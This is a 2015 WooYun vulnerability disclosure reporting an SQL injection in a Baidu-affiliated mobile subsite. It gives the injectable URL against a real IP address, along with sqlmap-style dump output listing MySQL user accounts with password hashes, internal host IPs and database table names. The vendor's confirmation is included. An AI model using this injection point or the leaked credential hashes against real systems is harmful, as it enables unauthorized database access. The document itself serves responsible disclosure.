当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125580

漏洞标题:百度旗下某业务子站SQL注入漏洞

相关厂商:百度

漏洞作者: xy小雨

提交时间:2015-07-09 11:12

修复时间:2015-08-23 14:20

公开时间:2015-08-23 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

一天小姨子来我家,刚好家里买了点香蕉,便问她要不要,小姨子说,不用不用。我:给你吃的,不是给你用的!顿时家里安静了...

详细说明:

http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1%27 路径

Target: 		http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1
Host IP: 42.62.39.206
Web Server: Apache
Powered-by: PHP/5.2.6
DB Server: MySQL time based
Resp. Time(avg): 275 ms
Current User: wap@11.11.0.125
Sql Version: 5.1.73-log
Current DB: baikan
System User: wap@11.11.0.120
Host Name: localhost.localdomain
Installation dir: /usr/local/mysql/
DB User & Pass: root::localhost
root::localhost.localdomain
root::127.0.0.1
::localhost
::localhost.localdomain
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.165
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.166
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.167
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.168
wap:*47F5587D14973816A255AB6698096D0D1DDBE6AD:118.144.95.169
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:localhost
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.152
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.128
wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:11.11.0.129
wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:1/.11.0.130
wap:*47F5587D14973816A2C5AB6698096D0D1DDBA6AD:11.11.0.131
wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.132
Data Bases: information_schema
baikan
mysql
test


Database: test
[1 table]
+---------------------------------------+
| te |
+---------------------------------------+
Database: baikan
[21 tables]
+---------------------------------------+
| admin_user |
| baikan_psort |
| baikan_saomiao_block_log |
| baikan_saomiao_keyword_log |
| baikan_sort |
| channel_bookorder_duoku |
| channel_bookorder_duokubak |
| cmread_book_info |
| global_level |
| wap_advertisement |
| wap_advertposition |
| wap_block |
| wap_blockbooks |
| wap_blockchildren |
| wap_cooperater |
| wap_cpbooks |
| wap_feedback |
| wap_keyword |
| wap_keywordposition |
| wap_page |
| wap_page_block |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

漏洞证明:

1.jpg


2.jpg

修复方案:

过滤

版权声明:转载请注明来源 xy小雨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-09 14:19

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-24 08:40 | &小小黑 ( 路人 | Rank:8 漏洞数:3 | 嘻嘻)

    0.0